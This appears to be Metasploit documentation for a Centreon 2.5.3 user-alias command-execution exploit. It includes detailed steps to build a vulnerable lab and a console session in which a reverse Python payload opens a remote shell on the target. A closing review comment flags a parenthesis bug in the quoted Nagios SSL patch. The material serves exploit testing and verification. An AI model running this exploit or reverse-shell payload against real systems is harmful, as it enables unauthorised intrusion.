## Vulnerable Application

1. [Exploit-db](https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz)
2. Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Creating a testing environment for this application involved many steps, so I figured I would document the process here.

1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was `centreon`

2. Install php5.6 [askubuntu](http://askubuntu.com/questions/756181/installing-php-5-6-on-xenial-16-04)

```
sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
sudo add-apt-repository ppa:ondrej/php
sudo apt-get install php5.6
sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
# at the package configuration prompts:
#   select OK
#   select No Configuration
sudo apt-get install snmp-mibs-downloader
```

3. Enable php5.6 in Apache with `a2enmod`, disable php7.0 with `a2dismod`

```
a2enmod php5.6
a2dismod php7.0
```

4. Restart apache with `sudo apache2ctl restart`

5. Install [Nagios Plugins](https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/quickstart-ubuntu.html) starting at step 6.
The plugins link is broken, utilize [nagios-plugins-2.1.1.tar.gz](http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz) instead

```
wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
tar xvf nagios-plugins-2.1.1.tar.gz
cd nagios-plugins-2.1.1/
./configure
make
sudo make install
```

5.1 If during make, you get an sslv3 method not found error, apply this patch (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)

```
--- plugins/sslutils.c.orig 2016-01-14 20:02:06.419867000 +0100 +++ plugins/sslutils.c 2016-01-14 20:01:36.091492000 +0100 
@@ -70,8 +70,13 @@ #endif break; case 3: /* SSLv3 protocol */ +#if defined(OPENSSL_NO_SSL3) + printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library."))); + return STATE_CRITICAL; +#else method = SSLv3_client_method(); ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1; +#endif break; default: /* Unsupported */ printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
```

6. Install [Centreon clib](https://documentation.centreon.com/docs/centreon-clib/en/latest/installation/index.html)

```
cd ~
git clone https://github.com/centreon/centreon-clib
cd centreon-clib/build
cmake .
make
sudo make install
```

7. Install [Centreon Broker](https://documentation.centreon.com/docs/centreon-broker/en/2.11/installation/index.html)

```
cd ~
git clone https://github.com/centreon/centreon-broker
cd centreon-broker/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```

8. Install [Centreon Engine](https://documentation.centreon.com/docs/centreon-engine/en/latest/installation/index.html)

```
cd ~
git clone https://github.com/centreon/centreon-engine
cd centreon-engine/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install
```

9. Now install [Centreon Web](https://documentation.centreon.com/docs/centreon/en/2.5.x/installation/from_sources.html) but only the command line portion.

```
sudo mkdir /var/log/centreon-engine
cd ~
# may need to install php-xml
sudo pear install XML_RPC-1.4.5
wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
cd centreon-2.5.3
sudo ./install.sh -i
# Answers entered at the installer prompts, in order:
q
y y y y y y y y y y
centreon
/var/log/centreon-engine
/home/centreon/nagios-plugins-2.1.1/plugins
/etc/init.d/centengine
/usr/local/bin/centengine
/usr/local/etc/
/usr/local/etc/
/etc/init.d/centengine
y y y y y y y y y y y
```

10. Fix apache config

```
sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
sudo a2enconf centreon
sudo service apache2 reload
```

11. Configure via website. Browse to /centreon

```
next
next
select centreon-engine
/usr/local/lib/centreon-engine
/usr/local/bin/centenginestats
/usr/local/lib/centreon-engine
/usr/local/lib/centreon-engine
/usr/local/lib/centreon-engine
next
select centreon-broker
/usr/local/lib/centreon-broker
/usr/local/lib/cbmod.so
/usr/local/lib/centreon-broker
/usr/local/lib/centreon-broker
/usr/local/lib/centreon-broker
next
Pick whatever details about your user you want, next
Fill in mysql Root password, next
next
next
finish
```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/centreon_useralias_exec`
4. Do: `set payload`
5. Do: `set rhost`
6. Do: `check`
7. Do: `run`
8. You should get a shell.

## Scenarios

Just a standard run.

```
msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
rhost => 192.168.2.85
msf exploit(centreon_useralias_exec) > set verbose true
verbose => true
msf exploit(centreon_useralias_exec) > check
[+] Version Detected: 2.5.3
[*] 192.168.2.85:80 The target appears to be vulnerable.
msf exploit(centreon_useralias_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious login
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
whoami
www-data
uname -a
Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
```
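
Review bot: In the added `OPENSSL_NO_SSL3` branch of the `plugins/sslutils.c` hunk from step 5.1, the call `printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));` has a doubled opening parenthesis, so the two arguments collapse into a single comma expression and `printf` receives only the translated message as its format string, losing the `"%s\n"` format and the trailing newline. Use single parentheses, matching the existing `printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));` in the `default` case of the same hunk.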